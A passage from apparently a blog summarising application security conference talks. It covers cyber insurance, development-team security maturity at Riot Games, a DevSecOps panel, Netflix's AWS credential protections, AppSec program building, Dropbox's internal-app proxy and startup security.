  2. Carriers: The company that holds the insurance policy; they collect premiums and are liable for a covered claim. They pool the risk of a large number of policy holders by paying out relatively few claims while collecting premuims from the majority of policyholders who don’t file claims over the same period.
  3. Reinsurers: Insurance purchased by insurance carriers to mitigate the risk of sustaining a large loss. The carriers esll of portioins of their portfolio to a reinsurer that aggregates the risk at a higher level. This spreading of risk enables an individual insurance company to take on clients whose coverage would be too much of a burden for a single insurance company to handle alone.
Reinsurance is insurance for insurers
Reinsurance blew my mind at first, but it makes sense.

Nicole walks through several types of insurance companies, including standard lines, excess lines, captives, direct seller,s domestic/alien, Lloyds of London, mutual companies, and stock companies.

Cyber Insurance - Background

The Cyber Insurance market is still early: only 15% of US companies have it and only 1% world-wide. As of 2016, it’s a $2.5B - $3.5B market and it’s estimated to be a $12B - $20B market by 2020.

A key distinction is differentiating between first party and third party insurance, both of which can be held by a company, individual, or group of individuals.

First party covers the policy holder against damages or losses to themselves or their property. Examples:

  • Breach notification
  • Credit monitoring services
  • PR campaign services
  • Compensating the business for lost income
  • Paying a ransom or extornist who holds data hostage

Third party protects the policy holder against liability for damages or losses they caused to a person or property. Examples:

  • Covers the people and businessses “responsible” for the systems that allowed a data breach to occur
  • Lawsuits relating to a data breach
  • Privacy liability
  • Technology errors & omissions
  • Writing and shipping vulnerable code/IoT

Key Terms

Coverage is the amount of risk or liability covered by a specific insurance policy, paid out up to a limit. A typical insurance policy is a collection of a series of coverages, each of which have their own sub-limit.

Exclusions define the types of risk that what will not be covered.

Important Note: coverages will typically specify whether it’s for first party or third party losses, and it’s critical to examine these terms.

Example Policies

Nicole then walks through a number of example policies composed of several coverage subcomponents, each having their own risk area and sub-limit. The examples are: incident response, cyber crime, system damage and business interruption, network security and privacy liability, media liability, technology errors and omissions, and court attendance costs.

Common Exclusions

Common exclusions that will not be covered by cyber insurance include: property damage or bodily injury due to security incidents, loss of IP, acts of war and terrorism (you’ve been hacked by a nation state), unlawful data collection (you collected data you shouldn’t have), failure to follow minimum security expectations which lead to a breach, there was a core Internet failure (e.g. in root DNS servers).

You need to negotiate exclusions. They are important and vary by carrier. The devil is in the details.

Nicole concludes with a number of challenges underwriters face, the people who evaluate risk and determine policy pricing, as well as some important legal tests of cyber insurance.

Can Cyber Insurance Help Align Incentives?
One point that Nicole made, that I thought was neat, was that hopefully cyber insurance will eventually to align economic incentives for security teams to do the right thing, not just because the security manager doesn’t want to get fired or have their company in the news. There have been a number of similar historical cases, like when homes had to be built to a fire-resistant code to be covered under the fire insurance Ben Franklin set up. Ideally, cyber insurance will be able to map risk to specific controls, which security teams can then use to justify headcount and budget, measurably improving their company’s security.

You can learn more and read some public cyber insurance polices in the SERFF Filling Acess system, an online electronic records system managed by the National Association of Insurance Commissioners (NAIC).

(in)Secure Development - Why some product teams are great and others aren’t…

Koen Hendrix, InfoSec Dev Manager, Riot Games
summary abstract slides video

Koen describes analyzing the security maturity of Riot product teams, measuring that maturity’s impact quantitatively using bug bounty data, and discusses 1 lightweight prompt that can be added into the sprint planning process to prime developers about security.

Security Maturity Levels

Based on observing how development teams discuss security and interact (or don’t) with the security team, Koen groups dev teams into 4 security maturity levels.

Teams at these maturity levels range from largely not thinking about security (Level 1), to having one or two security advocates (Level 2), to security being a consistent part of discussions but it’s not yet easy and natural (Level 3), to security consciousness being pervasive and ever-present (Level 4).

levels

Measuring Impact of Security Maturity Level

To examine if a dev team’s level had a measurable impact on the security of the code bases they worked on, Koen analyzed Riot’s 2017 bug bounty data group by team maturity level. The differences were clear and significant.

Compared to teams at Level 1, teams at Levels 2-4 had:

  • A 20% / 35% / 45% reduced average bug cost
  • A 35% / 55% / 70% reduced average time to fix
  • The average issue severity found from internal testing was 30% / 35% / 42% lower
Level 1 - Absence Level 2 - Reactive Level 3 - Proactive Process Level 4 - Proactive Mindset
Avg $ Per Bug $1 $0.8 $0.65 $0.55
Avg Time to Fix High Risk 1 0.65 0.45 0.3
Avg Issue Severity $1 $0.7 $0.65 $0.58
  • Avg $ Per Bug and Avg Time to Fix High Risk are fixed to $1 / 1 unit of time for Level 1 teams and Levels 2-4 are expressed in comparison to Level 1.
  • Avg Issue Severity - if bugs found through internal security reviews had been discovered through bug bounty, how expensive would they have been?

Prioritizing Security Investment

Riot Games chose to focus on raising Level 1 and 2 teams to Level 3, as that yields the biggest security benefits vs effort required, makes teams’ security processes self-sustaining without constant security team involvement, and makes them more accepting of future security tools and processes provided by the security team.

They did this by shaping development team behaviour, rather than purely focusing on automation and technical competencies and capabilities.

How to uplevel dev teams?

During standard sprint planning, dev teams now ask the following prompt and spend 2-3 minutes discussing it, recording the outcomes as part of the story in Jira/Trello/etc.:

How can a malicious user intentionally abuse this functionality? How can we prevent that?

Though the dev team may not think of every possible abuse case, this approach is highly scalable, as it primes devs to think about security continuously during design and development without the security team needing to attend every meeting (which is not feasible).

Final Thoughts

  • The security level of a team influences how the security team should interact with them.
    • If the majority of your teams are Level 1 and 2, rolling out optional toolings and processes isn’t going to help. First, you need to level up how much they care about security.
  • Work with Level 3 and 4 teams when building new tooling to get early feedback and iterate to smooth out friction points before rolling the tooling out to the rest of the org.

Read the full summary here.

Lessons Learned from the DevSecOps Trenches

Clint Gibler, Research Director, NCC Group

Dev Akhawe, Director of Security Engineering, Dropbox

Doug DePerry, Director of Product Security, Datadog

Divya Dwarakanath, Security Engineering Manager, Snap

John Heasman, Deputy CISO, DocuSign

Astha Singhal, AppSec Engineering Manager, Netflix

summary abstract video

Learn how Netflix, Dropbox, Datadog, Snap, and DocuSign think about security. A masterclass in DevSecOps and modern AppSec best practices.

Great “Start Here” Resource for Modern AppSec / DevSecOps
When people ask me, “What’s on your shortlist of resources to quickly get up to speed about how to think about security and how to run a modern security program, this is one of the handful I share. Check out the full summary for this one, I bet you’ll be glad you did.

Though the security teams may have different names at different companies (e.g. AppSec vs ProdSec), they tend to have the same core responsibilities: developer security training, threat modeling and architecture reviews, triaging bug bounty reports, internal pen testing, and building security-relevant services, infrastructure, and secure-by-default libraries.

Commonalities

Everyone built their own internal continuous code scanning platforms that essentially run company-specific greps that look for things like hard-coded secrets, known anti-patterns, and enforcing that secure wrapper libraries are being used (e.g. crypto, secrets management).

SAST and DAST tools were generally not found to be useful due to having too many FPs, being too slow and not customizable, and failing to handle modern frameworks and tech (e.g. single page apps).

Everyone emphasized the important of building secure-by-default wrapper libraries and frameworks for devs to use, as this can prevent classes of vulnerabilities and keep you from getting caught up in vuln whack-a-mole.

  • This can be hard if you have a very polyglot environment but it’s worth it.
  • Determine where to invest resources by a) reviewing the classes of bugs your company has had historically and b) have conversations with dev teams to understand their day-to-day challenges.

Building relationships with engineering teams is essential to knowing relevant upcoming features and services, being able to advise engineering decisions at the outset, and spreading awareness and gaining buy-in for secure wrappers.

When you’re building a tool or designing a new process you should be hyper aware of existing developer workflows so you don’t add friction or slow down engineering. Make sure what you’ve built is well-documented, has had the bugs ironed out, and is easy for devs to use and integrate.

  • If possible, include features that provide value to devs if they adopt what you’ve built (e.g. telemetry) and try to hitch your security efforts to the developer productivity wagon.

Invest in tooling that gives you visibility - how is code changing over time? What new features and services are in the pipeline? What’s happening to your apps in production?

Differences

Netflix has gotten value from an internal security questionnaire tool they’ve built, while Snap and Dropbox had their version rejected by dev teams. This was due to wanting to have in-person discussions and the lack of collaboration features, respectively.

While everyone agreed on the importance of having strong relationships with engineering teams, John argued that individual relationships alone are not sufficient: dev teams grow faster than security teams and people move between teams or leave the company. Instead, you need to focus on processes and tooling (e.g. wrapper libraries and continuous scanning) to truly scale security.

For most of the panel members, the security teams wrote secure wrappers and then tried to get devs to adopt them. The Dropbox AppSec team actually went in and made the code changes themselves. This had the benefit of showing them that what they thought was a great design and solid code actually had poor dev UX and high adoption friction.

Favorite Quotes

“What are all the ways throughout the SDLC where we can have a low friction way of getting visibility?”
-John Heasman

“Prioritize your biggest risks and automate yourself out of each and every one of them.”
-Divya Dwarakanath

“If you don’t have a solution to point devs to, then you finding bugs doesn’t really matter.”
-Astha Singhal

“You have to brutally prioritize. Work on the things that are most likely to bite you the worst, while keeping a list of the other things that you can gradually get to as you have time and as the security team grows.”
-Doug DePerry

“Hitch your security wagon to developer productivity.” -Astha Singhal

“First, invest in gaining visibility. Then start automating once you know exactly the situation you’re in and the data sets you’re dealing with.”
-Doug DePerry

“There’s no silver bullet, just lots and lots of lead bullets.” -Devdatta Akhawe

Don’t spend too much time trying to ensure you’re working on the perfect task to improve your company’s security. Choose something that makes sense and get started!

This panel was an awesome, dense braindump of smart people describing how security works at their companies. I highly recommend you read the full summary here. You can also check out the full transcript here.

Netflix’s Layered Approach to Reducing Risk of Credential Compromise

Will Bengston, Senior Security Engineer, Netflix
Travis McPeak, Senior Security Engineer, Netflix
abstract slides video

An overview of efforts Netflix has undertaken to scale their cloud security, including segmenting their environment, removing static keys, auto-least privilege of AWS permissions, extensive tooling for dev UX (e.g. using AWS credentials), anomaly detection, preventing AWS creds from being used off-instance, and some future plans.

Segment Environment Into Accounts

Why? If the account gets compromised, the damage is contained.

The Netflix security teams have built a nice Paved Road for developers, a suite of useful development tools and infrastructure. When you’re using the Paved Road, everything works nicely and you have lots of tools available to make you more efficient.

But there are some power users who need to go outside the Paved Road to accomplish what they need to do.

At Netflix, the security team generally can’t block developers- they need to avoid saying “no” when at all posssible.

Useful for separation of duties So the security team will instead put these power users in their own AWS account so they can’t affect the rest of the ecosystem.

Useful for sensitive applications and data Only a limited set of users can access these apps and data.

Reduce friction by investing in tooling to C.R.U.D. AWS accounts. If you want to do account level segmentation, you need to invest in some, for example, making it easy to spin, delete, and modify meta info for accounts. The Netflix cloud security team has invested heavily in these areas.

Remove Static Keys

Why? Static keys never expire and have led to many compromises, for example, when AWS keys in git repos are leaked to GitHub.

Instead, they want short-lived keys, delivered securely, that are rotated automatically.

Netflix does this by giving every application a role, and then the role is provided with short-lived credentials by the EC2 metadata service.

Permission Right Sizing

For many companies, it can be difficult to keep up with all of the services you’re running, and it’s easy for a service to get spun up that ends up being forgotten, if development leaves the company or gets moved onto a different. This represents recurring risk to your company, as these apps may have been given sensitive AWS permissions.

Netflix reduces this risk via RepoKid (source code, Enigma 2018 talk video). New apps at Netflix are granted a base set of AWS permissions. RepoKid gathers data about app behavior and automatically removes AWS permissions, rolling back if failure is detected.

RepoKid
When you build a cool tool, you gotta get a cool logo

This causes apps converge to least privilege without security team interaction, and unused apps converge to zero permissions! 🎆

RepoKid uses Access Advisor and CloudTrail as data sources. Access Advisor allows it to determine, for a given service, has it been used in a threshold amount of time? CloudTrail provides: what actions have been called, by when, and by whom?

Paved Road for Credentials

They wanted to have a centralized place where they could have full visibility into Netflix’s use of AWS credentials, so they built a suite of tools where they could provision credentials by accounts, roles, and apps as needed. If they could ensure that everyone used these tools, they’d know, for every AWS credential, who requested them and how they’re being used.

Before they built this tooling, developers would SSH onto boxes and access creds there, or curl an endpoint and do a SAML flow, but there wasn’t one solidified process to access creds, which made it difficult to monitor.

So the Netflix cloud security team built a service, ConsoleMe, that can handle creating, modifying, and deleting AWS creds.

Netflix's Layered Approach: ConsoleMe
Users can request credentials via a web interface using SSO or through a CLI

Another advantage of this approach is that when ConsoleMe is creating creds, it automatically injects a policy that IP restricts the creds to the VPN the requester is connected to, so even if the creds accidentally get leaked, they won’t work.

Because the cloud security team worked hard to make using ConsoleMe seamless for devs, they no longer see any devs SSHing in to an EC2 instance and getting creds that are valid for 6 hours, devs instead use the creds they receive from ConsoleMe that are only valid for 1 hour, reducing potential exposure time.

Benefits:

  • ConsoleMe provides a central place to audit and log all access to creds.
  • Anomaly detection If someone is trying to request creds to a service they don’t own, or something is behaving strangely, they can detect those anomalies and investigate.

Their biggest win has been locking credentials down to the Netflix environment, so if the creds get leaked in some way there’s no damage.

Delivery Lockdown

Netflix uses Spinnaker for continuous delivery. Several hardening improvements were made, including restricting users to only being able to deploy a role if you owned the application in question, as you might be able to escalate your privileges if you chose a role with more than your current set of permissions, as well as tagging application roles to specific owners.

Prevent Instance Credentials from Being Used Off-instance

Goal: If attacker tries to steal creds (e.g. through SSRF or XXE), the creds won’t work.

See Will’s other talk, Detecting Credential Compromise in AWS for details.

They block AWS creds from being used outside of Netflix’s environment, and attempts to do so are used as a valuable signal of a potential ongoing attack or a developer having trouble, who they can proactively reach out to and help.

The more signals we can get about things going wrong in our environment, the better we can react.

Improving Security and Developer UX
One thing Travis and Will mentioned a few times, which I think is really insightful, is that the logging and monitoring they've set up can both detect potential attacks as well as let them know when a developer may be struggling, either because they don't know how systems work or if they need permissions or access they don't currently have.

Oftentimes the security team plays the role of locking things down. Things become more secure, but also harder to use. This friction either slows down development or causes people to go around your barriers to get their jobs done.

What's so powerful about this idea is the point that the systems you build to secure your environment can also be used to detect when these systems are giving people trouble, so the security team can proactively reach out and help.

Imagine you were starting to use a new open source tool. You're having trouble getting it to work, and then the creator send you a DM, "Hey, I see you're trying to do X. That won't work because of Y, but if you do Z you'll be able to accomplish what you're trying to do. Is that right, or is there something else I can help you with?" Holy cow, that would be awesome 😍

One thing I've heard again and again from security teams at a number of companies, for example, in our panel Lessons Learned from the DevSecOps Trenches, is that to really get widespread adoption of security initiatives more broadly in your org, the tooling and workflow needs to not just be easy and frictionless, it ideally also needs to provide additional value / make people's lives better than what they were previously doing.

Keep this in mind next time your security team is embarking on a new initiative. After all, a technically brilliant tool or process isn't that useful if no one uses it.

Detect Anomalous Behavior in Your Environment

Netflix tracks baseline behavior for accounts: they know what apps and users are doing, and they know what’s normal. This let’s you do neat things once you realize:

Some regions, resources, & services shouldn’t be used 🛑

Netflix only uses certain AWS regions, resources and services - some they don’t use at all. Thus when activity occurs in an unused region, or an AWS service that is not used elsewhere generates some activity, it’s an immediate red flag that should be investigated.

Unused Services

A common attack pattern is when one gets a hold on some AWS credentials or has shell access to an instance, you run an AWS enumeration script that determines the permissions you have by iteratively calling a number of API calls. When unused services are called, the Netflix cloud security team is automatically alerted so they can investigate.

This approach has been used to stop bug bounty researchers quickly and effectively.

Anomalous Role Behavior

This is the same idea as for services, but at the application / role level. Applications tend to have relatively consistent behavior, which can be determined by watching CloudTrail.

The cloud security team watches for applications that start behaving very differently as well as common attacker first steps once they gain access (e.g. s3:ListBuckets, iam:ListAccessKeys, sts:GetCallerIdentity, which is basically whoami on Linux). These API calls are useful for attackers, but not something an application would ever need to do.

Future

Travis and Will shares a few items on the Netflix cloud security team’s future road map.

One Role Per User

Traditionally Netflix has had one role that’s common to a class of users; that is, many apps that need roughly the same set of permissions are assigned the same AWS role.

However, if there are likely at least slight differences between the permissions these apps need, which means some apps are over provisioned. Further, grouping many apps under the same role makes it harder to investigate potential issues and do anomaly detection.

In the future, when every user/app has their own AWS role, they can guarantee least privilege as well as do fine-grained anomaly detection.

Remove Users from Accounts They Don’t Use

Will and Travis would like to automatically remove users from AWS accounts they don’t use. This reduces the risk of user workstation compromise by limiting the attacker’s ability to pivot to other, more interesting resources- an attacker who compromises a dev laptop only gains access to the services they actively use.

Offboarding is hard. Devs may stop working on a project, move between teams, or leave the company. Having an automated process that detects when someone hasn’t used a given account within a threshold amount of time and removes the access would significantly help keeping things locked down over time.

Whole > Sum of the Parts

All of these components are useful in isolation, but when you layer them together, you get something quite hard to overcome as an attacker, as there are many missteps that can get them detected: they need to know about the various signals Netflix is collecting, which services are locked down, etc. The goal is to frustrate attackers and cause them to go for easier targets.

Starting Strength for AppSec: What Mark Rippetoe can Teach You About Building AppSec Muscles

Fredrick “Flee” Lee, Head Of Information Security, Square
abstract slides video

In this talk, Flee gives some excellent, practical and actionable guidance on building an AppSec program, from the fundamentals (code reviews, secure code training, threat modeling), to prioritizing your efforts, the appropriate use of automation, and common pitfalls to avoid.

All while using building a weight lifting as an analogy.

Starting Strength: Book Cover
I never expected to be including a weight lifting book cover in my security talk summaries, but here we are

To be honest, I don’t normally like talks that are “security is like X,” but this talk was fun, engaging, and chock full of practical, useful advice. And now I have an 8 pack, thanks Flee! 💪

Key Takeaways

The core points from Flee’s talk:

Start small with your program
Start with things where you can start seeing some wins on day 10, don’t only invest in things where you’ll start getting value 2 years in. You can’t be Google and Netflix tomorrow.

Specificity + Frequent Practice == Success
In times of crisis, we fall back on what we’ve practiced the most. This is what’s going to make you successful.

Measure everything!
That’s how you convince yourself you’re making progress and get buy-in from management.

You are not Ronnie Coleman - don’t use his program (yet)
If you’re just starting out or have a small program, it might not make sense to adopt what the biggest/most complex teams are doing. Pick the right thing for your company at the right time.

Everyone can do this
Your company doesn’t need an AppSec team to have a decent AppSec program, these are all things devs can do themselves.

Overview

Good AppSec is a muscle, it has to be trained and continuously practiced or else it atrophies.

If you’re just starting out, Flee believes the 3 core fundamentals for AppSec are:

  • Code reviews (security deadlifts)
  • Secure code training (security squats)
  • Threat modeling (security bench press)

The Fundamentals

Code Review

All security critical code should receive a code review prior to deployment. For example, AuthN/AuthZ components, encryption usage, and user input/output.

The “Security-critical” caveat is there because most teams don’t have the resources to review everything. Focus on the most important parts.

Developer Training

All devs should have received language specific secure development training at least annually.

  • Don’t show kernel devs the OWASP Top 10 - they’ll be bored as it’s not relevant to them.
  • Rather than using generic examples, it’s much more interesting and engaging to show devs previous vulns from your company’s code bases. This makes it feel real and immediate.
  • Emphasize how to do the right thing, don’t just point out what the vulnerability is.

You know you’re doing training right when attendees like it!

See some of Coleen’s thoughts in the CISO Panel and Leif’s talk Working with Developers for some great details on how Segment makes security training for their devs fun and engaging.

Threat Modeling

All new significant features should receive a design review, lead by developers with the security team assisting. AppSec should be there as a coach/assistant. This is an good way to get developer buy-in for security.

Document the results and plan mitigations for identified risks.

Getting Started - Beginner Gains!

Many teams start off trying to solve every vulnerability class. This is too much and be overwhelming. Instead, pick a handful of key vulns to focus on. This focus can enable you to make a big impact bin a relatively short amount of time.

Pick issues that are important to your business first. Are there any vuln classes that continue to pop up, from pen testing, bug bounty, and/or internal testing? If you’re not sure which vulns to focus on initially, that’s OK, you can pick a generic standard list, like the OWASP Top 10.

You’ll find that your weakest/most neglected areas improve quickly. Start small and learn!

Focus on Critical Areas

What’s most important to your business? Which teams historically have the most problems? Help them level up.

Aim your reviews at areas that return the biggest bang for the buck (e.g. high risk apps).

Get progress in a safe, refined way, for example, by defining processes or using checklists. Following the same established routine every time => get the same quality of results.

Understand the languages and frameworks your company uses. If you don’t know the stack your devs are using, you won’t be able to give them very good advice, and it damages their trust in you if you make generic or wrong recommendations.

Get help from devs - they can give you feedback on if you’re pushing security forward in a safe and sane way. Devs know the code the best, know what it’s supposed to do, etc.

Adding Automation and Tools

Adding automation helps you scale, but it’s not where you should start. Nail the fundamentals first: understand where you are and the problems you have and target them.

Static analysis can be a great tool, but it isn’t perfect and you shouldn’t start with it. Add it in after your company already has a good understanding of how to do code reviews. You should first have a good idea of the types of issues the tool should be looking for, otherwise you’ll end up wasting time.

Automation supplements humans. It doesn’t replace all manual effort: you still need a good code review program.

Don’t lose focus on risk reduction. This is ultimately what security is about.

Every Day is Leg Day

Some activities are so useful that they should occur in every project. For example, code reviews have a huge return on risk reduction vs effort. Flee’s never had an instance where a code review wasn’t useful. They’re not quick, but they’re valuable.

Make the activity mandatory, but make reduce friction where possible to ensure the process is easy and palatable to dev teams. The security team doesn’t necessarily need to do it, these activities can be done by devs in many orgs. Have the security team engage devs: “Hey, here are some security things that you should be looking for.”

Measure and Record Your Progress

You can’t manage what you don’t measure
If you don’t measure your progress, you won’t know if you’re succeeding. What are the common vulns you’re seeing? By team / product? For example, if a team has been having trouble with SQL injection, give them focused training. Also, tune tools to target your most common vulns.

Record verything
If it’s easy to log, collect it. Track ALL defects found, and make them visible: to everyone, not just security team. Devs will change their behavior when that info is public. This doesn’t need to be done in a negative way, but rather helping people keep themselves accountable. If devs don’t see this info collected in one place, they might not know themselves.

Adopt Standards and Expert Help

Leverage what you’ve learned to start enforcing coding guidelines. As you progress, you can become stricter on what counts as a code review “violation.”

Over time, try to move the AppSec team towards being “coaches” of reviews rather than “reviewers.” The AppSec team should be personal trainers for the developers performing the reviews. Security Champions can scale AppSec efforts really well.

Refining for Specific Goals

Once you’ve mastered some fundamentals, you can tweak your review process to target specific weaknesses:

  • Tune your code reviews/static analysis to find issues specific to your org (even non-security issues).
  • Re-inforce good practices with automation, not just pointing out problems.
  • Build/user secure frameworks and services.

Pro-tip: A powerful way to get dev buy-in for static analysis is show them how to find a non-security coding bad practice they care about. For example, foo() needs to never have a hard-coded string passed in its second argument.

If you find this idea interesting, feel free to check out my ShellCon 2019 talk about finding code patterns with lightweight static analysis.

Pitfall: Taking on Too Much

Don’t expect to cover every project immediately, especially if you’re just starting with a small team.

Don’t get hung up on low-risk apps and vulns and not give time to other code bases or other classes of issues that are more impactful. Some vulns matter more than others.

Give your program time to grow. You’re not going to have FAANG-level security in a year, especially if you have a small team. Overpromising what you’ll be able to accomplish in a short amount of time to other people in your org can damage your reputation and their trust in you.

Pitfall: Bad Form

No developer buy-in
Devs are incentivized to ship features. You have to be mindful of their perspective and mindset. Ideally members of the security team have some dev background, as it’s incredibly useful to be able to speak engineering’s language and communicate how they think.

Generic secure development training
Flee finds most security training is bad - it’s generic and not customized to the types of technologies one’s company uses or the situations their devs typically face. This make it much harder to get dev buy-in and interest, as the training is taking some of their time.

Using Untuned Tools
Flee has never found a security tool that you buy, run without tuning, and the output is useful. Tools always require customization.

Pitfall: Trying to Use (the wrong) Shortcuts

There are no silver bullets to create a strong AppSec program, it takes time and effort.

Skipping documentation/metrics
You can’t just find bugs and put them in Jira. You need to document what you found and your results along the way so you can look back later and hold yourself and others accountable.

Don’t over rely on tools only
Despite what’s shouted from the RSA and BlackHat vendor halls, tools won’t solve all your problems.

Avoid FUD when trying to influence devs
Using FUD to try to motivate devs undermines your credibility and makes them less likely to listen to you in the future. You need their buy-in: that’s your best ally in getting security to run and work well.

What about insert your fav activity?!?!

This talk discussed code reviews, secure code training, and threat modeling because they’re the fundamentals.

There are other things that are useful, but they don’t have to be there on day 1 (e.g. pen testing, ng(WAFs), RASP, etc.) They have their uses, but aren’t critical to AppSec.

Starting Strength: Mark Rippetoe Quote
Word on the street* is Flee used to write that on every performance review he gave his team. * I may or may not have just made that up.

Questions

How do you do targeted, tailored training in an org when you have many languages and frameworks?

This is hard. Partner with devs and security champions and have them help you create the training.

Rugged Software also has some useful ideas on integrating security into agile dev environments.

The Call is Coming From Inside the House: Lessons in Securing Internal Apps

Hongyi Hu, Product Security Lead, Dropbox
abstract slides video

A masterclass in the thought process behind and technical details of building scalable defenses; in this case, a proxy to protect heterogenous internal web applications.

Why care about securing internal apps?

In short: they often have access to sensitive data, and it’s technically challenging.

Compared to production, customer-facing applications, internal apps often get neglected by security teams. However, these internal apps often expose sensitive data or functionality, like a debug panel for production systems or a business analytis app with sensitive company data.

Unfortunately we can’t just firewall off these internal apps, as they could get accidentally exposed by a network configuration, they can be targeted by an external attacker via CSRF or SSRF, or there may already be an attacker in your environment (hacker or insider threat).

Internal app security is interesting and challenging due to the scale and heterogenity.

Securing Internal Apps - Motivation
Scale: Most companies have a handful of primary production apps but hundreds of internal apps.
Heterogenity: The production apps likely use a well-defined set of core tech stacks for which the security team has built secure by default frameworks and other defenses. This is not scalable to dozens of other languages and frameworks. Further, internal apps may be built by people who don’t spend much of their time coding.

When embarking on this work, the Dropbox security team had the following goals:

  • The defenses should be scalable and agnostic to the backend’s tech stack.
  • Scalable development and adoption process - development teams’ adoption needs to be as frictionless and self-service as possible.

I want to emphasize how smart these goals are: any backend-agnostic defense would be a great win, and building a great technical solution isn’t enough, you need adoption. And if the security team needs to be involved when the defense is applied by every dev team or project, that’s going to eat up your time for the next… forever.

The Approach

Assuming we’re starting with a blank slate (no defenses), how do we scale up security basics to hundreds of web apps quickly?

tl;dr: Add network isolation and enforce that all internal apps must be accessed through a proxy, which becomes a centralized, scalable place to build defenses into.

Securing Internal Apps - Proxy Architecture

This approach allows them to:

  • Add authentication that they log and review and enforce strong 2FA (SSO + U2F)
  • Access control - check permissions for all requests, using ideas like entry point regulation
  • Enforce that users are using modern, up-to-date browsers (not vulnerable to known exploits, strong security posture)
  • Add monitoring, logging, etc.

Other Applications: Later in the talk, Hongyi goes into detail of how they used this proxy approach to add CSRF protections (add SameSite cookie flags) and XSS protections (Content-Security-Policy headers + nonces). He also makes the argument that using WAFs on internal networks can be effective, as internal networks shouldn’t have the level of malicious noise that your external websites will.

They have a number of ideas for other applications of the proxy that they haven’t yet done, including CORS allowlists, preventing clickjacking, invariant enforcement, sec-metatdata, channel-bound cookies, canaries, and more.

Reflections on the Approach

Benefits:

  • Gives you a centralized, scalable place to build defenses into.
  • App owners don’t have to build these defenses themselves.
  • It’s easy to deploy patches and changes - you only have to deploy bugs to one place, and it’s a service the security team has control over.
  • Provides a number of benefits to other security partners: InfraSec, Detection and Response, etc.

Tradeoffs / Considerations:

  • A team needs to maintain the proxy and be oncall when issues arise.
    • This should be a team with experience maintaining high uptime systems. Consider partnering with your InfraSec team or an infrastructure team.
  • Reliability (and performance issues, to a lesser extent) are critical.
    • Ideally, if the proxy goes down you fail closed (safe), but if there are critical systems behind the proxy, you’ll be blocking people from doing their job.
    • e.g. If you have a monitoring system behind your proxy, if the proxy goes down, you won’t be able to troubleshoot.

Lessons Learned

Make developer testing and deployment easy; otherwise, this makes more work for the security team as you need to be heavily involved in adoption. The less friction there is, the more likely developers will want to use it.

Similarly, reduce mental burden on developers as much as possible, using blessed frameworks with defenses built-in and autogenerate security policies.

Make deployment and rollback safe and fast. You’re going to spend a lot of time troubleshooting policy mistakes, so make it quick and easy to reverse those mistakes. Make testing and debugging trivial.

Prioritize for your highest risks when rolling out the proxy; there will always be too much to do, so you have to brutally prioritize. For example CSP might be too much work in your organization, other mitigations may be enough- the migration work migght not be worth the risk reduction provided.

Which apps will reduce the most risk to protect?

Expect challenges; find trusted partners to try out ideas. In every company, there are people and teams that are more excited about security and willing to be early adopters of new security tools, services, and processes, even if they are currently half-baked, buggy, and high friction to use.

Start with them and iterate based on their feedback. This reduces the cost of failure, as you won’t be burning bridges when your solution isn’t perfect (which may cost you political capital if you bring it to less willing engineering teams before it’s ready). These early adopter teams can give you quick feedback, which allows you to increase your iteration speed.

On iteratively creating policies
Much of the work the Dropbox team ended up doing was refining policies. They could’ve saved a lot of time by initially adding the ability to enforce a relaxed policy while testing a tighter policy.

NIST CyberSecurity Framework

For tieing all of these ideas together into a coherent strategy, Hongyi recommends the NIST CyberSecurity Framework.

Securing Internal Apps - NIST Cyber Security Framework
The NIST framework identifies 5 main security functions (column headings). Fill out this table and for each category, think about:
  • Who are the teams you need to involve?
  • What is the tech you have to build?
  • What are the processes to create?

This process helps you figure out where are your company’s gaps are and where to invest going forward. This becomes your roadmap, which is also a great way to communicate your strategy to senior management.

Hongyi has borrowed some ideas from Adam Shostack: he considers these efforts like a security investment portfolio, where you’re investing, where you want to change those investments. This is a simple tool but very flexible, you can adapt it as needed.

Final Thoughts

When you’re determining your AppSec team’s priorities, aim to scale your defenses and your processes.

Internal security engineering can be a great place to experiment with new features and to train up new security engineers. For example, if you’re not sure about CSP or SameSite cookies, you can deploy them internally first and learn from the experience. It’s also a good way to get experience building safe frameworks, as thet reliability requirements are much lower than in externally facing production contexts.

Startup Security: Starting a Security Program at a Startup

Evan Johnson, Senior Security Engineer, Cloudflare
summary abstract slides video

In this talk, Evan describes what it’s like being the first security hire at a startup, how to be successful (relationships, security culture, compromise and continuous improvement), what should inform your priorities, where to focus to make an immediate impact, and time sinks to avoid.

This talk won’t help you build Google Project Zero in the next year, but it will give you a set of guiding principles you can reference.

If you’re lucky enough to be the first person working on security at a company then you have a great privilege and great responsibility. Successful or not, it’s up to you.

You will set the security tone of the company, and interactions with you will shape how your colleagues view the security team, potentially for years to come.

Evan’s Background

Evan has only worked at startups - first at LastPass, then as the first security engineer at Segment, then he was the first security engineer at Cloudflare, which he joined in 2015.

Security at a SaaS business

Evan breaks down “doing security” in a SaaS business as “protecting, monitoring, responding, and governing” the following categories: production, corporate, business operations, and the unexpected.

It’s also critical for the security team to communicate what they’re doing to their colleagues, other departments, the board, and the company’s leadership. Security progress can be hard to measure internally, but it’s an important aspect of your job, as is being accurate and setting the right expectations externally.

Security at Startups

Joining a startup is a great way early in your career to get more responsibility than anybody should probably give you.

If you want to be successful at a startup, there are 3 core aspects:

  1. Relationships
  2. Security Culture
  3. Compromise and Continuous Improvement

1. Relationships

When you are building a security program from scratch
Your coworkers are your customers! Building strong relationships with your engineers is the key to success. Without this, you’ll have a hard time getting engineers to work with you.

Building strong relationships with everyone else in the company is important as well. Try baking security in to the on-boarding and off-boarding flow, as it’s a great place to add security controls and meet your colleagues.

Your relationships are defined in times of crisis.

When issues arise, assure people it’s okay, you’ll fix things together. As much as possible, be level-headed, calm, and methodical in times of crisis.

2. Security Culture

Think about the type of security culture you want to build within your company. If you pull pranks on unlocked laptops, does that foster the type of trust between your team and the rest of the company that you want?

3 tips to building security culture:

  • Smile, even if you’re in introvert.
  • Be someone people like to be around.
  • You should be making technical changes (i.e. have an engineering-first culture on security teams).
    • Building things earns trust with engineers who are building your product, as it shows you can contribute too.

3. Compromise and Continuous Improvement

Meet people where they are and try to continuously work with them to make them more secure. It’s no one’s fault that they have bad practices or are insecure, but it’s your responsibility to do something about it.

Realize that it can sometimes take years to get the kind of traction you want to fix underlying issues. That’s OK.

Your First Day

You enter the startup’s office. There are huge windows with natural light and edgy but not too edgy art on the walls. Exposed brick and pipes are plentiful, it’s a bit hard to think over the cacophony of the open office floor plan, and there’s more avocado toast then you can shake a term sheet at.

Startup Security: Office
If you don’t fulfill the above description, r u even a startup, bro?

The co-founder sits you down and asks:

So, what challenge are you going to tackle first?

How Security Starts

